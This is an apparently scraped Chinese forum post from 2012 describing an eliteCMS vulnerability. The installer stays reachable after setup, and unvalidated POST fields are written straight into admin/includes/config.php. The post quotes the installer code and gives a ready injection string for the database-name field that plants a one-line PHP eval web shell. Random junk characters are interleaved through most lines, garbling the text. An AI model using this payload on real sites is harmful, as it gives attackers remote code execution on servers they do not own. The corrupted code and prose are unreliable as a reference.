eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装5 ?) a' L; |/ P. V o
1 K3 G& [ o9 f7 p( N# I另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
% S6 F: e9 ^. f7 R" E1 |) T我们来看代码:
. ?4 W) R1 L% X
. q6 W- o- P, z+ q, k# w..." |; T' J. c I$ q
elseif ($_GET['step'] == "4") {
* e# v( V& d7 B: I; f $file = "../admin/includes/config.php";; Q5 u- d& x. M; d6 c! Q8 h
$write = "<?php\n";
4 U6 ^2 _+ r m# i0 ~; _ $write .= "/**\n";
/ |+ D% }* m, M' ]; V" n $write .= "*\n";) ?# [1 r" g: H2 [/ f
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
* p1 Y1 \. d. _( J, Q- W...略...
7 o( \. b6 m- }1 P/ Q: [% b: l+ E $write .= "*\n";5 E) l! B1 h/ ?9 u1 y: X! P: Y' _
$write .= "*/\n";) B2 q, s: J6 F- J8 v
$write .= "\n";
1 E1 B. ^, q& |+ x# m5 Q $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";3 N5 u" a4 g: g; y* y
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";! N1 M h7 Y% s* v; M5 ^+ s% i
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";6 ~8 `& O. u7 r8 ]' n R3 p& ~
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
! u" m; Z# V0 x1 n4 b7 T $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
) _6 m: V3 G1 P! p $write .= "if (!\$connection) {\n";
$ R" r) \1 ?) \+ ?4 U% R $write .= " die(\"Database connection failed\" .mysql_error());\n";' u( k' k! K5 K1 `" j! w
$write .= " \n";1 D' Y7 Q I [+ z, w
$write .= "} \n";
& k0 J* @& U& c) U0 {% A M6 \ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";- X! _4 n% @! H% F) n7 a6 U
$write .= "if (!\$db_select) {\n";' `' n3 e J: l0 Y( {! B7 ?
$write .= " die(\"Database select failed\" .mysql_error());\n";
3 P! P- c* \$ ?/ {' |" O+ w $write .= " \n";
* _2 J d: E. B $write .= "} \n";3 N. p' n( Z9 F2 @) x' K' K$ s
$write .= "?>\n";
& W; G8 ?: x: `* e2 W$ g1 V& F # n* F) J u* F
$writer = fopen($file, 'w');
% O- r% ?' b: p; Y! L8 x: w9 o...
: X8 O$ {. f6 U8 o+ t+ R ' ~4 r- p( e' @
在看代码:. k7 E4 _0 T$ X# q4 X
. R- d2 [2 O! d0 c2 n* Z0 z3 m- z$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
" n3 }3 ^4 Q7 b$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
6 X( I) `: H4 B4 D) d8 k3 \, g! @$_SESSION['DB_USER'] = $_POST['DB_USER'];/ `( o8 O7 x7 `4 U, k8 W* \) w( K
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
) ?) W7 J& B- {8 }8 \3 d. V% D 5 R, g4 y2 {7 h- c* O k
取值未作任何验证
4 ]$ F) r6 m A2 h/ |# p: P如果将数据库名POST数据:, Z! T8 A5 _) p; u
# m- F. k" R6 q"?><?php eval($_POST[c]);?><?php- U/ x9 }$ e" c$ f2 s) E+ i
4 H$ t0 D6 |; |8 q+ D* n) i将导致一句话后门写入/admin/includes/config.php5 e' A% g8 k5 U9 X3 ~
|
发表于 2012-11-18 13:59:27
收藏
支持
反对